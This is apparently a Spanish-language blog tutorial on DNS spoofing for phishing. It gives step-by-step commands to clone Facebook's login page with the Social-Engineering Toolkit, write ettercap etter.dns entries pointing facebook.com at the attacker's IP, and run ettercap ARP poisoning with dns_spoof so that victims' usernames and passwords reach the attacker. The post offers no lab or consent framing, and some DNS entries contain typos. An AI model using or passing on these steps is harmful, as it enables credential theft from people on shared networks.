Dns Spoofing.
Básica mente consiste en dar datos dns que no se han originado en un servidor dns autorizado. Con ello conseguimos dar una ip falsa a una entrada dns o al contrario.
Con esta técnica podemos clonar páginas web para hacernos con las contraseñas del dispositivo atacado.
Ejecuccion.
Para he utilizado la distribución de Backtrack 5 R3. Es gratuita y puedes conseguirla desde aquí.
1 Iniciamos la distribuicón
2 Abrimos una terminal y escribimos
#cd /pentest/exploits/set/
#./set
Se abrirá la aplicación SET para realizar ataques de tipo ingeniera social
Elegimos la opción 1
3 Posteriormente en la siguiente escogemos la opción 2 del menú.
4 En el siguiente menú la opción 3
5 En Site Cloner escogemos la opción 2
6 En las opciones para clonar la pagina con éxito tendremos que ingresar nuestra dirección IP la cual podemos hayar con el comando ifconfig en otra terminal.
7 Luego se nos pide la pagina web que deseamos clonar para el ejemplo utilizamos la de facebook
El clonado comienza para lo que es necesario que apache esté iniciado, pero no te preocupes sin es así nos muestra un mensaje que nos pide y o n para activarlo, como es por supuesto escogemos y.
8 Para realizar el envenenamiento utilizamos ettetcap editamos y escribimos:
nano /usr/local/share/ettercap/etter.dns
Dentro de este escribimos
facebook.con A 192.168.1.38
*.facefook.com A 192.168.1.38
www.facebook.com PTR 192.168.1.38
Con todo esto solo he de indicar que 192.168.1.38 es nuestra ip
Pulsamos Ctrl+o para guardar y Ctrl+x para salir.
9 Envenenamos con:
ettercap -T -q -i Adaptador de red -P dns_spoof -M arp
Cuando el usuario intente entrar en la red su login y contraseña nos aparece a nosotros.
